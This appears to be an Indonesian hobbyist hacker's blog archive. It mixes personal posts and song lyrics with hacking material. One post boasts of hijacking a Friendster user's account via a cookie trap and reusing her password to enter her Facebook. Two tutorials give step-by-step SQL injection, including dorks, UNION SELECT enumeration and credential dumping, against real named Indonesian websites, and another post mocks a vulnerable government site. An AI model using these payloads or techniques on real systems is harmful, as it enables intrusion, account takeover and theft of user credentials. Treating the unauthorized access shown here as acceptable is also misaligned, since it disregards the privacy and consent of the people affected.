login friendster = login facebook ?
what the BACK!!!
saya ol lagi dan menjalani hidup seperti biasanya (?)
Ok, karena ol saya kali ini ga jelas jeluntrungannya maka timbul niat sayah buat mencoba ato tepatnya mensurvey hal bodoh (lagi), jadi gini :
sekarang tu kan lagi hot2nya (emang apaan aja...HOT) anak2 mude jaman sekarang pada maen facebook (baca : fesbuk),nah...berdasarkan penelitian yang dilakukan di kurosystem corp (sumpah yang ini ngawur abis!!) bahwa antara periode desember 2008 - sekarang banyak pengguna friendster yang beralih ke facebook! ga percaya?? sama...saya juga nggak!
karena pada pindah ke facebook, saya yang seekor yang bisanya cuma ikut2an, ya ikutan juga deh akhirnya, pindah ke facebook!
wew...singkat cerita si sayah kan kadang2 masih maen ke friendster juga, dan masih ada aja loh korban2 dari jebakan di cookie fs sayah...hehe! berbekal cookie ini pun sayah melakukan hal iseng (seperti biasanya). sayah coba take over salah satu account fs (dan tentu mengembalikannya lagi, karena cuman pengen dapetin email + password si korban doang) hehe (anak yang baik jangan tiru ini ya...yang sedang penulis lakukan saat ini adalah contoh dari anak yang sangat baik sekali! :D).
Okeh back to topic...
singkat cerita, THE END! (ya nggak lah...)
jadi abis dapetin email + password salah satu korban yang kita samarkan saja namanya menjadi "Mawar" (busyet...kenapa mesti mawar ya? biarin dah...lagi pengen aja. :D). eits, sebelum menelisik lebih lanjut lagi, ada satu pertanyaan...ko saya milih si "Mawar" buat dijadiin sapi percobaan? jadi gini, setelah liat profile fs si "Mawar" ini saya melihat tulisan di about me-nya, ya kira2 kaya gini : "add facebook gw juga yah disini [sensor]@[sensor].com", wew...setelah diliat ternyata email friendster si "Mawar" dan email facebook yang dia tawarin buat di add tu SAMA! waha...dalam pikiran saya ni yah, sapa tau aja password buat kedua email ini ternyata juga sama! :D
dan setelah memasukkan data si "Mawar" yang didapet dari hasil take over via account-nya dari friendster ke halaman login facebook-nya, dan klik login.....WALAAAA!!! MASUK LOH!!! Jiakakkakaka...
beneran aja lho ternyata, email + pass si "mawar" yang ada di friendster ternyata sama dengan yang dia pake buat login facebook-nya. :D
sebenernya ada niat buat ngacak2 tu isi facebook si "Mawar" sekaligus membubuhkan nama perusahaan sayah (hueeek...) di facebooknya, tapi begitu sadar kalo hal itu terlalu kekanak2an, sayah pun logout saja dari account facebook si "Mawar".....the end
Kesimpulan : ternyata kalo kita bisa dapetin password via friendster, kemungkinan besar diatas 50% peluang kita buat bisa login juga di facebook dengan email + password yang sama...hihihi
Tidak percaya?? percayalah!!! (terinspirasi Ripley Believe It Or Not....heheheheh)
Pesan Moral : Umm...cari sendiri deh, ato silakan aja posting comment-nya yah! Tengkyu...Mmuuah! :D
SQLi by kurosystem
kaya-nya udah lama ga posting tutorial, ngepost tentang tutorial lagi ah...
wokeh, beberapa posting sebelumnya saya pernah bahas tentang dasar2 sql injection...
sekarang dipostan saya kali ini bakal langsung peng-aplikasian-nya a.k.a TERJUN KE LAPANGAN! :D
NB : lebih baik sebelum baca yang ini liat dulu posting saya sebelum ini,yang ini:
http://diary-kuro.blogspot.com/2009/02/dasar-sql-injection-by-newbie.html
biar nyambung..hehe
yang udah, langsung aja...cari site indo aja ya? hoho...
okeh, kita cari dork digoogle-nya pake : "news_detail.php?id= site:id"
NB : tu kita pake "id" karena mo nyari site indo
*cari sana sini...cek sql injection atu2...akhirnya dapet*
http://www.m-wizard.biz/news_detail.php?id=3
next...cari batas jumlah table database sekaligus magic number-nya...
http://www.m-wizard.biz/news_detail.php?id=-3 union select 1,2,3,4--
dah dapet tu...enter dah!
hoho..angka yang keluar cuman 1, 1! :D
sekarang kita liat tabel2 yang ada didalam databasenya. caranya?
perintah yang sayah pake bwt ngluarin tabel adalah :
group_concat(table_name)
ama
from information_schema.tables where table_schema=database()
masukkan group_concat(table_name) pada magic number yang udah dikeluarin tadi (yang tadi kita dapet = 1)
dan from information_schema.tables where table_schema=database() ditaroh dibelakang
jadinya gini nih :
http://www.m-wizard.biz/news_detail.php?id=-3 union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=database()--
nah tu keliatan dah tu semua table yang ada di databasenya,disini yang kita cari table yang berisi user ma pass! (tujuan kita...hehe)
diantara table2 yang keluar disitu ada table user_t...(karena dicurigai memiliki data pass ma user! :D)
kita akan ngeluarin column yang ada didalam table user_t ini
sebelumnya kita konvert table user_t menjadi hexa dulu...hasilnya : 757365725F74
NB : buat konvert dari string ke hexa klik aja disini
lalu kita keluarin columnnya, caranya?
perintah yang sayah pake bwt ngeluarin column-nya adalah :
group_concat(column_name)
ama
from information_schema.columns where table_name=*HEXA DARI NAMA TABELNYA*
http://www.m-wizard.biz/news_detail.php?id=-3 union select group_concat(column_name),2,3,4 from information_schema.columns where table_name=0x757365725F74--
*HEXA DARI NAMA TABELNYA* disini udah diganti...jadi user_t yang tadi udah kita rubah dari bentuk user_t (string) jadi bentuk 757365725F74 (hexa)
nah..keliatan deh column yang ada di tabel user_t
langkah selanjutnya,kita keluarin deh data2 dari column user_id,user_password,user_name....hehe! caranya ganti column name jadi column2 yang udah muncul tadi, dan dibagian akhir kita ambil langsung ke nama tabel-nya (user_t) jadi gini:
http://www.m-wizard.biz/news_detail.php?id=-3 union select group_concat(user_id,0x3a,user_password,0x3a,user_name),2,3,4 from user_t--
woho...liat yang ada disitu! xixiixixix....
selanjutnya tinggal cari login admin-nya,,disini kita tinggal kira2 aja deh...dan login sebagai admin/webmaster disitu...dan kalo bentuk password-nya dlm bntuk md5 ya di-crack dulu... :D
thx to bang :
GOOGLE,incomp13te,Xshadow,indounderground,yadoy666,dll...(masi banyak) hehe..
Next Project : belajar tentang RFI (Remote File Inclusion), doain yak...:D
lagi2 online dengan sebuah bugs.... :D
sebuah kartu selular ternama masih saja terdapat bugs yang memungkinkan saya untuk bisa ol (ga diwarnet lagi) hehehehe...
emang sih, koneksinya lemot abis.....tapi selama itu gratis, no problemo! hahahaha
biar lebih dramatis,,sekali lagi deh....GRATIS!
tapi sori ga dikasih tau dah bugs yang mana, daripada ntar abis saya post disini si empunya bugs ini ngerasa mening didiemin aja deh,,,saya nikmatin aja dulu! hehehehe....
cuman pengumuman aja! ehehe!
proyek ganti layout fb?
6 bulan = setengah tahun
karena tepat tgl xx februari kmren (interval 10-20) seekor kuro membuktikan bahwa selama 6 bulan terakhir ini manusia ini laku sebagai manusia yang tidak sendiri (lho?), ya..selama 6 bulan ini seekor kuro memiliki seorang yang berarti dalam hidupnya (selain ortu, teman, dan si Bejo flash disk hijau 1gb kesayangan-nya. hehehe). ya...seorang akhwat (bukan ibunya) selama ini telah mendampingi hidupnya selama 6 bulan lebih x hari sehingga menciptakan kehidupan yang subhanallah dan lebih bersinar (soalnya dibawah neon) disetiap dia menjalani hari2nya sebagai seekor kuro yang baik dan benar.
karena ga ada kerjaan pula seekor sayah ngeposting hal ini dan berharap ada beberapa orang ga da kerjaan buat baca dan mendoakeun kelanggengan hubungan si kuro dengan si akhwatyang sangat beruntung ini mendapatkan seekor kuro yang baik hati nan pandai menabung di WC ini. huhuhuhuhu *dilempar sepatu*
karena baru sadar kalo saya baru aja nge-posting blog sebanyak 3 paragrap terakhir dengan selalu di awali kata "karena" dan merasa bahwa seekor sayah agak bodoh juga kalo meneruskan kebodohannya terus menerus selama 5 waktu kedepan (?) saya akhirkan saja postingan ini dengan HAMDALLAH!!
karena itu lewat postingan ini...saya minta dukungan-nya! caranya gampang....kirimin pulsa sebanyak2nya ke no hp sayah! *dilempar ensiklopedi*
karena...UDAH AH! heheh...
bangkit!
liriknya keren + bener2 bisa ngebangkitin semangat orang putus asa kaya saya!!
huahauhauahuahua.....
Menantang hari coba tuk temui semua rasa benci dan segala aral menanti
Blah! bosan ku melihat semua pecundang, membabi buta teriak tanpa alasan
Menghabisi teman puh! ludahi kawan, merasa benar memaksa semua ambisi
Bangkit berontak, tak kuasa terus berdiam diri
Disni ku melawan, takkan ada lagi korban
Tarik kembali, semua hakikimu yang paling hakiki, dan tanpa ternoda
Bangkit, Bangkit
Raihlah semua kembali
Bebaskan gerak diri
Melangkah dengan pasti
Bangkit Bangkit
Temukan semua yang tlah hilang dan takkan lepas
Takkan ku lagi berdiam diri, coba tuk akhiri, segala yang kualami
Bangkit berontak, tak kuasa terus berdiam diri
Disini ku melawan takkan ada lagi korban
Tarik kembali semua hakkmu yang paling hakiki
dan tanpa ternoda
Bangkit! Bangkit!
Raihlah semua kembali!
Bebaskan gerak diri!
Melangkah dengan pasti!
Bangkit! Bangkit!
Raihlah semua kembali!
Mantapkan semua dalam diri ..go!!
ada apa dgn roy suryo?? jiakakakka....
pertama...buka google, disearch form-nya ketikin "temukan roy suryo" dan klik..."saya lagi beruntung"
apa yang ada disitu....
Maaf, Google tidak mau lagi menemukan Roy Suryo, daripada nantinya dibilang salah kutip.
Penelusuran Anda - Temukan Roy Suryo - tak cocok dengan dokumen manapun.
Saran:
* Coba kata kunci yang berbeda.
* Coba kata kunci yang lebih umum.
* Coba kurangi kata kunci.
* Cari orang lain saja.
jiakakakaka....yang paling bikin konyol adalah saran terakhir...
"Cari orang lain saja"
hahahaahah...dasar roy suryo! jiakakakkaka....
hikz...pilek
ya...penyakit yg sebenernya ga sakit2 amat...tapi bener2 nyusahin, huhuhuhu. biasa ni kaya gini, kebetulan bandung...yang dikenal sebagai kota
yang jelas liburan saya kali ini kayanya bakal banyak sering diabisin di rumah...ini tandanya intensitas ol saya bakal berkurang, brusaha memulihkan kondisi tubuh sebelum memasuki semester baru...hehehe!
rapidleech???
rapidleech merupakan web yg bisa ngedonlod file dari beberapa share site, kaya rapidshare, 4shared, easy-share dll dsb dst dah! :D
dengan ini kita bisa ngedonlod file dengan koneksi paralel (tidak langsung) atau dengan download manager tanpa kita harus menggunakan premium account. cara kerjanya,kita download file ke hosting yang kita pasang aplikasi rapidleech... nah, walaupun tanpa koneksi pararel, sebuah hosting pasti (biasanya) punya jumlah bandwidth yang jauh lebih besar daripada koneksi kita toh? nah, abis kesimpen,baru kita donlod file tadi ke komputer kita...pake download manager. nah..karena file-nya udah dihostingan kita, kita bisa pake koneksi penuh buat donlod-nya,knapa? karena bandwidth-nya pasti jauh lebih kecil.
cape ngejelasin, coba aja ndiri deh...
ni beberapa link-nya :
http://rapidleech.info/bin/
http://mp4tube.co.cc/
http://help2hide.com/rapidshit/
http://www.nbe-media.net/rapidleech/
http://1kibou-anime.net/
kalo tertarik punya rapidleech sendiri dunlud aja link dibawah ini..
http://h1.ripway.com/xkuro/blog/RapidleechPlugMod_rev.36_by_eqbal.rar
kalo udah punya rapidleech dihostingan sendiri, saran saya sih ga usah dipromosi2in ke sapa2...pake aja buat sendiri, biar bandwidth-nya juga ga kebagi2...hehe
moga berguna...see you next post!
add-ons buat ngecek sql injection
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi
NB : firefox user only! hehe..
ga sengaja dapet site pemerintah yang vuln
xixiixix....silakan aja dah tu, males nyari login adminnya! hahaha...
salah sendiri...udah di gaji ma pajak rakyat, yee...security-nya senilai ma tempe! huuh...
my master league team
ganti layout...hikz
lagian XML blog yang kmren wilayah teks dalam postingan-nya terlalu kecil..kadang kalo nulis link ato apa kadang ga ketulis semua.
makadari itu diluncurkan lah layout "green verbose kurosystem style!"
oke..saya tau namanya maksa sekali....ya peduli amat lah!
cuma pengen tau komentar, caci maki, hinaan dan deraan abis saya ganti layout ini.....(mudah2an ada yang ngasih komen...hikz)
dasar SQL injection by NEWBIE! ^^
jadi maab kalo rada bingung baca post saya berikut...soalnya saya yang bikin juga bingung.jiakakakakak....
opo sih SQL injection teh?
hmm...SQL injection merupakan teknik eksploitasi database via remote, dgn menggunakan SQL Query (perintah2 sql) buat mengetahui data2 target...dan tujuan akhirnya DEFACE! huhu...(ga juga deng)
ya pokoknya intinya gitu dah...
terus, gimana cara ngecek SQL Injection pada sebuah web? (ngecek site yang Vulnerable)
yang paling sering dipake ato digunakan para SQL INJECTOR (baca : DEFACER...jiakakaka) adalah dgn menggunakan command "AND 1=1" dan "AND 1=2"
1. AND 1=1 (kondisi true)
2. AND 1=2 (kondisi false)
berhubung yang saya tau cuma cara ini ya tutor-nya pake ini aja ya..hehe
okeh, kita langsung coba cari target kita
umm, cari site indo aja dah....coba pake dork digoogle-nya : "berita.php?id="
ambil salah satu deh ya...
http://www.amikbalikpapan.ac.id/Berita.php?id=5
nah, coba tambahin command diatas tadi buat ngecek SQL Injection-nya...jadi gini
1. http://www.amikbalikpapan.ac.id/Berita.php?id=5 AND 1=1
2. http://www.amikbalikpapan.ac.id/Berita.php?id=5 AND 1=2
apa beda url 1 ma 2? gini...
dalam kondisi AND 1=1 (true),dgn command ini halaman sitenya tidak akan mengalami perubahan, nah kalo pake kondisi AND 1=2 (false) halaman sitenya pasti akan berubah, biasanya sih bakal muncul pesan error gitu...nah kalo ada errorr-nya gitu berarti site ntu bisa di-eksploitasi dengan pake SQL Injection.
umm..untuk command false, biasanya bisa pake penambahan ' pada akhir url...biar lebih gampang. contohnya kaya gini :
http://www.amikbalikpapan.ac.id/Berita.php?id=5'
Next...
gimana cara cari jumlah table database web yang akan exploitasi ma sql injection?
yang saya tau aja ya...biasanya pake command order by
angka dibelakang command order by merupakan jumlah table-nya, kita cari satu per satu...mulai dari angka 1 :D, contohnya gini...
http://www.amikbalikpapan.ac.id/Berita.php?id=5 ORDER BY 1/*
keterangan :
/* ==> tanda buat pengakhir perintah,kadang juga bisa diganti dengan --
setelah di enter ternyata ga ada perubahan ini artinya halamannya masih dalam kondisi true, itu tandanya table site ini lebih dari 1. blom dapet jumlah tepat table-nya kan? langsung coba aja angka 10
http://www.amikbalikpapan.ac.id/Berita.php?id=5 ORDER BY 10/*
wew..setelah dienter,halamannya error a.k.a berubah, ini berati site dlm kondisi false! apa artinya? tadi ambil angka 1 true....angka 10 false, berati jumlah table site ini antara 1-10 toh? hehe..bener ga? langkah selanjutnya? cari satu persatu dari 8 angka sisanya! :D
dicoba2 akhirnya dapet ni "batas"-nya...
1. http://www.amikbalikpapan.ac.id/Berita.php?id=5 ORDER BY 5/*
2. http://www.amikbalikpapan.ac.id/Berita.php?id=5 ORDER BY 6/*
yang pake angka 5, kondisi site masih true...sedangkan pas kita coba naekin ke 6, berubah jadi false!
ini membuktikan kalo jumlah database site target adalah 5! kita coba ganti perintahnya jadi union select....
1. http://www.amikbalikpapan.ac.id/Berita.php?id=5 UNION SELECT 1,2,3,4,5/*
2. http://www.amikbalikpapan.ac.id/Berita.php?id=5 UNION SELECT 1,2,3,4,5,6/*
setelah dicoba 1 per satu, kondisi true pada URL pertama dan kondisi false pada URL kedua kan?
terbukti! hehe...
next....magic number!
magic number adalah angka2 yang keluar pada halaman site, angka2 ini dipake buat disusupi SQL Query (command2 SQL).
nah, trus gimana cara dapetin magic numbernya?
salah satu caranya dengan nambahin tanda - didepan angka setelah variabel. contoh diatas yaitu angka 5. [Berita.php?id=-5]
http://www.amikbalikpapan.ac.id/Berita.php?id=-5 UNION SELECT 1,2,3,4,5/*
enter dah!
angka2 berapa ajah yang keluar pada halaman site?
ada angka 2, 3 dan 4 kan?
nah...jadi angka2 ini yang akan kita pakai untuk memasukkan SQL Query [perintah2 SQL], dan dimasukkan + digantikan pada url tabel URL dari union select! ngerti? langsung aja deh...hehe
umm...ni beberapa SQL Query yg bakal dipake dan kegunaannya...
version() --> menampilkan versi dari database target
database() --> menampilkan database yang berada dalam target
user() --> menampilkan user yang berada dalam target
nah, buat cari versi, database dan user dari target...tinggal kita masukin deh...
dari yang tadinya :
http://www.amikbalikpapan.ac.id/Berita.php?id=-5 UNION SELECT 1,2,3,4,5/*
diganti jadi...
http://www.amikbalikpapan.ac.id/Berita.php?id=-5 UNION SELECT 1,version(),database(),user(),5/*
ngerti ga perubahannya? jadi gini...
angka yang keluar dari halaman site target tadi kan 2,3 dan 4. nah, istilah kasarnya..disinilah celah yang terbuka buat nambahin SQL Query! buat mengetahui data yang kita inginkan.
jadi magic number yang udah dikeluarin tadi diganti dengan perintah2 SQL...begitu.
langkah selanjutnya? enter...dan liat apa yang ada disitu..hehe
ya...segitu aja beberapa dasar dari SQL Injection dari sayah, blom berani bikin tutor buat bener2 ngebuka data tabel,data user+pass target dan tentu ngedeface-nya...hehe, blom pinter!
moga berguna....tengkyu.
maaf kalo banyak kesalahan dan ketidakjelasan, maklum..mempelajari SQL Injection baru 3 hari yang lalu.hehehe...
thx to :
om google
mas wikipedia
spesial thx to om inc0mp13t3
Wassalam....
cara bodoh nyetop timer link donlod
nah,setelah saya cari2 lewat perantara dukun google dapet juga trick bodoh buat ngakalinnya.
pas timer mulai berjalan mundur, ketikin java script berikut ke address bar browser anda
javascript:alert(c=0)
abis ntu bakal muncul alert, klik OK deh....
WALAAA!!! link donlodan pun langsung muncul. hehe
PISS OUT, moga berguna....DILARANG PARKIR! (loh?)
"3" masih aja dudul....:D
dulu dipostingan sya jaman saya masih maen di wordpress pernah bahas soal bugs three, tentang bugs di kartu perdana 3...(tapi kayanya post-annya udah dihapus deh, WP-nya juga ga tau kemana...hehe), sekarang mo bahas tentang bugs three (lainnya), mungkin udah ada yang tau...tapi ya sekalian bagi2 aja sapa tau ada yang blom tau.....kalo udah tau ya lumayan si buat nambah2in posting blog.hehe
oke...ga tau bisa disebut bugs ato bukan, jadi gini kejadiannya...
saya yang akhir2 ini jadi pengguna three..karena suatu "alasan",mengetahui bahwa batas waktu masa berlaku kartu three saya saat itu 13 januari 2009, tapi anehnya....setelah tanggal 15 januari 2009, saya masih bisa menggunakan three saya buat sms...(bukan buat nelpon!), karena penasaran soal hal ini...saya coba cek lagi informasi pulsa three saya...(*111#), saya baca disitu, bahwa memang...kartu three saya cuman berlaku sampe 13 januari 2009! aneh, ya udah gpp toh saya ga rugi ini...jiakakakkak! abis itu saya coba sms lagi ke "seseorang" (hehe..),,,ERROR! Message Barred! Berkali2 saya coba tetep demikian....ko bisa ya? padahal sebelumnya (hari itu juga) masih bisa....SEBELUM SAYA CEK INFORMASI PULSA! hm...kayanya disini sebabnya...
intinya, saat kita mengecek pulsa, three melakukan filter...(ya istilah kasarnya gitu sih, biasa maen2an ma patching ma filtering sih. jiakakkaka). diibaratkan kita menghindari filterisasi friendster dah, kita taroh linker diabout me, abis ntu disave...selama kita ga mampir2 lagi ke editprofile.php filter terhadap linker yang kita simpan ga bakal terjadi...sama halnya ama three ini, selama kita pake sms-an gpp, tapi kalo udah konek ke *111# disinilah filter terjadi....makanya abis cek informasi pulsa three sayah yang tadinya masih bisa padahal masa aktifnya habis, jadi ke cek lagi dah ma three-nya....ke filter deh! kali aja gitu...hehe
NB : ampe postan saya ini....saya masih bisa menggunakan three saya walo masa aktif-nya dah abis 2 hari yang lalu..hehe